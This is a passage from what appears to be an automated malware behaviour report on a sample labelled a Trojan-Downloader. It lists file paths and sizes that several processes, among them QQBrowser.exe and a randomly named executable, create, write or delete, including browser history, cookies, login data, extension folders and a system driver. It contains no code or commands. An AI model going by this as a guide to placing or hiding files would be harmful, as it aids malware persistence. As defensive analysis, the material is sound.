%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\LOG (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sr\messages.json (814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\th\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es\messages.json (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\History (39278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\LOG (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\E.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\id\messages.json (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Favicons-journal (31194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\da\messages.json (642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\26.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Favicons (12598 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\et\messages.json (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pl\messages.json (666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\2E.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fi\messages.json (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28.tmp (22828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\de\messages.json (701 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ru\messages.json (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000004 (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hu\messages.json (710 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\cs\messages.json (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\sso-f1.zip.qbl (259728 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Quick Links (59841 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Top Sites (3588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12.tmp (2631 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Shortcuts (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000002 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (556 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2A.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\EncryptedStorage-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Storage\chrome-extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\000003.log (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2C.tmp (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ko\messages.json (669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\History-journal (39124 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_l9L1ZczXTKrKKpE (322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\QQBrowserOTA.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sk\messages.json (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\1B.tmp (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\LOG (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_PT\messages.json (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\29.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\tr\messages.json (650 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cookies (1043 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\22.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Login Data-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\18.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\19.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_BR\messages.json (667 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2F.tmp (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\manifest.json (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ro\messages.json (668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\manifest.json (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Current Session (1147 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\bak\Bookmarks.20160519101458.bak (1 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_19810 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\iniC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_4008 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Bookmarks~RF9521b.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\QQBrowserOTA.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_26618 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\sso-f1.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_29118 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Preferences~RF995bc.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_17994 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Preferences~RF9376f.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Preferences~RF96dc1.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Local State~RF95c7c.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_18243 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\Temp\scoped_dir_1252_2294 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\48.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\sso-f1.zip.qbl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_128.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Local State~RF98d01.TMP (0 bytes)

The process QQBrowser.exe:2364 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\manifest.json (390 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\QBFixerForGJ.exe (32104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\QBFixerPlugin.dll (21288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_MESSAGE_CATALOGS (24 bytes)

The process QQBrowser.exe:2852 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\background.js (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\manifest.json (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\game-iframe.js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\background.html (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\video-iframe.js (1 bytes)

The process QQBrowser.exe:2764 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\QQPCDetector.dll (43024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\manifest.json (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\GJTipsPlugin.dll (20400 bytes)

The process QQBrowser.exe:2836 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%System%\WIWFg4kt8m.log (2 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\Common\gjdatareport.dll (76 bytes)

The Trojan-Downloader deletes the following file(s):

%System%\WIWFg4kt8m.log (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\Report.Ini (0 bytes)

The process QQBrowser.exe:4064 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab23.tmp (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 (933 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 (164 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\QBSafe.dll (1658 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\qrx13.tmp.qbl (48802 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1F.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab20.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar24.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\manifest.json (270 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar21.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1E.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\qrx13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1E.tmp (0 bytes)

The process QQPCDownload8889533.exe:1584 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\setup.xml (588 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (3323635 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDownload.kui (1741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\qmdr\dr.dll (75 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)

The process j3lx7ew39.exe:2960 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\TsQBDrvDll.dll (1328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\zh-CN.pak (216 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\qb\zh-CN.pak (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\nsis_skin.gt (47 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\manifest.json (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\QBSafe.dll (1640 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QRCode.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\PrScrn.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\amd64\tsqbdrv.sys (2015 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qb_100_percent.pak (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\tsurllib.dat (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb\en-US.pak (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\resources.pak (139454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\Default\Config Bookmarks (992 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ExportFavHtml.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker\qbroker.exe (2285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Frame.dll (33015 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\xaml\InformationBox.xaml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\QBInstaller.dll (6305 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\manifest.json (268 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\resources.pak (137723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\InformationBox.xaml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QQBrowserLiveup.exe (7682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Config Bookmarks (992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\switch_core (25 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\tssafeedit.dat (1281 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\PepperFlash\pepflashplayer.dll (122894 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker\qbroker64.exe (4011 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\snapshot_blob.bin (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\icudtl.dat (72895 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_child.dll (323648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb\zh-CN.pak (12 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\qb\en-US.pak (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_elf.dll (94 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\navi.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\History (204 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qbroker\qbroker64.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\manifest.json (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_200_percent.pak (3085 bytes)
%System%\drivers\TsQBDrv.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\d3dcompiler_47.dll (43606 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qb_200_percent.pak (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\xaml\ClearDialog.xaml (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\TsService.exe.new (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libEGL.dll (1015 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome.dll (257739 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_elf.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\Downloader.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UserPinnedTemp\QQ浏览器.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin (12 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\History (1281 bytes)
%Documents and Settings%\%current user%\Desktop\上网导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\腾讯软件\QQ浏览器\卸载QQ浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\service\TsService.exe.new (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\BugReport.exe (3465 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\腾讯软件\QQ浏览器\QQ浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\extensions\commenExtension.crx (24 bytes)
%Documents and Settings%\%current user%\Application Data\QB\driver\TsQBDrvDll.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\icudtl.dat (76782 bytes)
%Documents and Settings%\%current user%\Application Data\QB\navi.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_200_percent.pak (9606 bytes)
%Documents and Settings%\%current user%\Desktop\QQ浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QQBrowserLiveup.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\uninst.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\tssafeedit.dat (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQBrowser\BugReport.exe (2321 bytes)
